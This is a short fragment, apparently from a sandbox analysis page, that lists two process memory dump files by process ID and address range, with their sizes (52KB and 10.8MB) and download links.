memory/6804-532-0x00007FFA5D320000-0x00007FFA5D32D000-memory.dmp

Filesize
52KB

Download
memory/6936-438-0x00000177C6600000-0x00000177C70C1000-memory.dmp

Filesize
10.8MB

Download